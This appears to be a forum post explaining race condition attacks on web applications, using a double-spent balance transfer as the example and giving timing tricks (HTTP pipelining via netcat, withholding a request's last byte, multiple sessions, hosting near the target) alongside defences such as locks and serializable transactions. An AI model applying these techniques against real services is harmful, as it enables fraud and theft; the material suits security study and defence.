Web Hacking Race condition in web applications

ErrorHunter · Aug 25, 2022

Vasya wants to transfer the 100 dollars he has in his account to Petya. He goes to the transfers tab, drives in Petin's nickname and in the field with the amount of funds to be transferred - the number 100. Next, he clicks on the transfer button. Data to whom and how much is sent to the web application. What can be happening inside? What does a programmer need to do to make everything work correctly?

Make sure you have enough money in your account

You need to make sure that the amount is available for Vasya to transfer. It is necessary to get the value of the user's current balance, if it is less than the amount he wants to transfer, tell him about it. Taking into account the fact that our site does not provide for loans, the balance should not go into minus.

Subtract the amount to be transferred from the user's balance

It is necessary to write down the current user's balance minus the transferred amount into the balance value of the current user. It was 100, it became 100-100=0.

Add to the balance of the user Petya the amount that was transferred.

Petya, on the contrary, it was 0, it became 0 + 100 = 100.

Display a message to the user that he is well done!

When writing programs, a person takes the simplest algorithms, which he combines into a single plot, which will be the program script. In our case, the task of the programmer is to write the logic for transferring money (points, credits) from one person to another in a web application. Guided by logic, you can create an algorithm consisting of several checks. Let's imagine that we just removed everything unnecessary and made up pseudocode.

Pseudocode

QUOTE:

But everything would be fine if everything happened in order of priority. But a site can serve many users at the same time, and this does not happen in one thread, because modern web applications use multiprocessing and multithreading to process data in parallel. With the advent of multithreading, programs have a funny architectural vulnerability - a race condition (or race condition).
And now imagine that our algorithm works simultaneously 3 times.

Vasya still has 100 points on his balance, only somehow he accessed the web application in three threads at the same time (with a minimum amount of time between requests). All three threads check if the user Petya exists and check if Vasya has enough balance to transfer. At the moment when the algorithm checks the balance, it is still equal to 100. As soon as the check is passed, 100 is subtracted from the current balance 3 times, and Petya is added.

What we have? Vasya has a negative balance on his account (100 - 300 = -200 points). Meanwhile, Petya has 300 points, when in fact he should have 100. This is a typical example of race condition exploitation. It is comparable to the fact that several people go through one pass at once. Below is a screenshot of such a situation by @4lemon

Race conditions can exist in both multi-threaded applications and the databases they run on. Not necessarily in web applications, for example, this is a common criterion for privilege escalation in operating systems. Although web applications have their own characteristics for successful operation, which I want to talk about.

Typical race condition operation

QUOTE:

In most cases, to test/exploit a race condition, use multi-threaded software as a client. For example, Burp Suite and its Intruder tool. They put one HTTP request to repeat, set up many threads and turn on the flood. Like for example in this article . Or in this one . This is a fairly working method if the server allows the use of multiple threads on its resource, and as they say in the articles above - if it doesn’t work out, try again. But the fact is that in some situations, it may not be effective. Especially if you remember how such applications access the server.

What's on the server

Each thread establishes a TCP connection, sends data, waits for a response, closes the connection, reopens it, sends data, and so on. At first glance, all data is sent at the same time, but the HTTP requests themselves may not arrive synchronously and inconsistently due to the peculiarities of the transport layer, the need to establish a secure connection (HTTPS) and resolve DNS (not in the case of burp) and many layers abstractions that go through data before being sent to a network device. When it comes to milliseconds, this can play a key role.

HTTP Pipelining

Think of HTTP-Pipelining, where you can send data using a single socket. You can see for yourself how it works by using the netcat utility (you have GNU/Linux, right?).
In fact, it is necessary to use linux for many reasons, because there is a more modern TCP / IP stack that is supported by the operating system kernels. The server is most likely on it too.
For example, run the command nc google.com 80 and paste the lines there

Code:

GET / HTTP/1.1
Host: google.com

GET / HTTP/1.1
Host: google.com

GET / HTTP/1.1
Host: google.com

Thus, within one connection, three HTTP requests will be sent, and you will receive three HTTP responses. This feature can be used to minimize the time between requests.

What's on the server

The web server will receive requests sequentially (keyword), and process the responses in order of priority. This feature can be used for a multi-step attack (when it is necessary to perform two actions sequentially in a minimum amount of time) or, for example, to slow down the server in the first request in order to increase the success of the attack.
Trick - you can prevent the server from processing your request by loading its DBMS, especially effectively if INSERT / UPDATE is used. Heavier requests can "slow down" your workload, thus, there will be a higher probability that you will win this race.

Splitting an HTTP Request into Two Parts

First, remember how an HTTP request is formed.
Well, as you know, the first line is the method, path, and protocol version:
GET / HTTP/1.1
Next comes the headers until the line break:
Host: google.com
Cookie: a=1
But how does the web server know that the HTTP request has ended?
Let's look at an example, enter nc google.com 80, and there

Code:

GET / HTTP/1.1
Host: google.com

after you press ENTER, nothing will happen. Click again and you will see the answer.
That is, two newlines are required for the web server to accept an HTTP request. And the correct request looks like this:
GET / HTTP/1.1\r\nHost: google.com\r\n\r\n
If it were a POST method (do not forget about Content-Length), then the correct HTTP request would be like this:

Code:

POST / HTTP/1.1
Host: google.com
Content-Length: 3

a=1

or
POST / HTTP/1.1\r\nHost: google.com\r\nContent-Length: 3\r\na=1\r\n\r\n
Try to send a similar request from the command line:
echo -ne "GET / HTTP/1.1\r\nHost: google.com\r\n\r\n" | nc google.com 80
As a result, you will receive a response, since our HTTP request is complete. But if you remove the last character \n, you won't get an answer.

In fact, for many web servers, using \n as a hyphen is enough, so it's important not to swap \r and \n, otherwise further tricks may not work.

What does it give? You can open multiple connections to a resource at the same time, send 99% of your HTTP request, and leave the last byte unsent. The server will wait until you send the last newline character.
After it is clear that the bulk of the data has been sent, send the last byte (or several).
This is especially important when it comes to a large POST request, for example, when you need to upload a file. But even in a small request, this makes sense, since delivering a few bytes is much faster than simultaneously kilobytes of information.

Delay before sending the second part of the request

According to the results of research by Vlad Roskov , it is necessary not only to split the request, but it also makes sense to make a delay of several seconds between sending the main part of the data and the final one. And all because web servers start parsing requests even before they receive it in its entirety.

What's on the server
For example, nginx, when receiving HTTP request headers, will start parsing them, adding the incomplete request to the cache. When the last byte arrives, the web server will take the partially processed request and send it directly to the application, thereby reducing the processing time for requests, which increases the likelihood of an attack.

How to deal with it

First of all, of course, this is an architectural problem, if you design a web application correctly, you can avoid such races.
Usually, the following methods of combating an attack are used:

Use locks .
The operation blocks calls to the locked object in the DBMS until it is unlocked. Others stand and wait on the sidelines. It is necessary to work correctly with locks, not to block anything superfluous.
They rule by transaction isolations .
Ordered transactions (serializable) - ensure that transactions are executed strictly sequentially, however, this may affect performance.
Use mutex semaphores (simply).
They take some thing (for example, etcd). At the time of the function call, a record with a key is created, if it was not possible to create a record, then it already exists and then the request is interrupted. When the request is processed, the record is deleted.

And in general, I liked the video of Ivan Hard worker's speech about locks and transactions, very informative.

Peculiarities of sessions in the race condition

One of the peculiarities of sessions can be that it itself interferes with the exploitation of the race. For example, in PHP, after session_start(), the session file is locked, and it will be unlocked only when the script ends (if there was no session_write_close call ). If at this point another script is called that uses the session, it will wait.
To bypass this feature, you can use a simple trick - authenticate the required number of times. If the web application allows you to create multiple sessions for one user, we simply collect all PHPSESSIDs and make each request its own identifier.

Proximity to the server

If the site on which you want to exploit the race condition is hosted in AWS, take a wheelbarrow in AWS. If in DigitalOcean - take it there.
When it comes to sending requests and minimizing the sending gap between them, close proximity to the web server is definitely a plus.
After all, there is a difference when ping to the server is 200 and 10 ms. And if you're lucky, you may even end up on the same physical server, then it will be a little easier to race

.

For a successful race condition, various tricks can be applied to increase the likelihood of success. Send multiple requests (keep-alive) in one, slowing down the web server. Break the request into several parts and create a delay before sending. Reduce the distance to the server and the number of abstractions to the network interface.
As a result of this analysis, Michail Badin and I developed the RacePWN
tool. It consists of two components:

The librace library in C, which sends many HTTP requests to the server in the minimum time and using most of the tricks from the article
The racepwn utility, which takes a json configuration as input and generally drives this library

RacePWN can be integrated into other utilities (for example, in Burp Suite), or you can create a web interface for managing races (there is still no way to get around). Enjoy!

But in fact, there is still room to grow and we can remember HTTP / 2 and its prospects for attack. But at the moment, most HTTP/2 resources have only a front, proxying requests to the good old HTTP/1.1.
Maybe you know some other subtleties?

Web Hacking Race condition in web applications

ErrorHunter

New member